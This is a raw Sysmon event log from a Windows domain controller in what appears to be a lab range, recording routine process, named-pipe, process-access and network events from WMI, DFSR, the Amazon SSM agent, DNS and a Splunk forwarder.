12:01:03.060{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline 
UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get Version /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 18141800x80000000000000002307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:01:03.050{266CAFBE-647E-6064-4300-00000000AE01}3924\Amazon\SSM\InstanceData\healthC:\Program Files\Amazon\SSM\ssm-agent-worker.exe 18141800x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:01:03.050{266CAFBE-647E-6064-4300-00000000AE01}3924\Amazon\SSM\InstanceData\terminationC:\Program Files\Amazon\SSM\ssm-agent-worker.exe 17141700x80000000000000002305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:03.048{266CAFBE-647E-6064-4300-00000000AE01}3924\Amazon\SSM\InstanceData\testPipeC:\Program Files\Amazon\SSM\ssm-agent-worker.exe 10341000x80000000000000002304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.029{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.029{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000002302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.028{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.028{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.027{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.027{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.022{266CAFBE-647D-6064-3100-00000000AE01}26723308C:\Windows\system32\DFSRs.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.005{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.004{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000002295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.004{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.004{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.004{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.002{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.999{266CAFBE-647D-6064-3100-00000000AE01}26723236C:\Windows\system32\DFSRs.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c3ca|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.987{266CAFBE-6480-6064-5700-00000000AE01}30083748C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.403{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local64138- 354300x80000000000000002505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.402{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49695-false169.254.169.254-80http 354300x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.400{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49694-false169.254.169.254-80http 354300x80000000000000002503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.203{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49693-false169.254.169.254-80http 
354300x80000000000000002502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.090{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49692-false169.254.169.254-80http 354300x80000000000000002501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.047{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49691-false169.254.169.254-80http 354300x80000000000000002500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.045{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49690-false169.254.169.254-80http 354300x80000000000000002499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.042{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49689-false169.254.169.254-80http 354300x80000000000000002498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.038{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49688-false169.254.169.254-80http 354300x80000000000000002497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.035{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49687-false169.254.169.254-80http 354300x80000000000000002496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.817{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54221- 354300x80000000000000002495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.723{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64876- 354300x80000000000000002494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.636{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.64-53859-false10.0.1.14win-dc-892.attackrange.local5986- 354300x80000000000000002493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.496{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local65022- 354300x80000000000000002492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.496{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98d0:c4a5:d9d:ffff-65022-true7f00:1:2c1b:100:60e6:0:86e6:0-53domain 354300x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.408{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64138- 10341000x80000000000000002490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6480-6064-5700-00000000AE01}3008C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
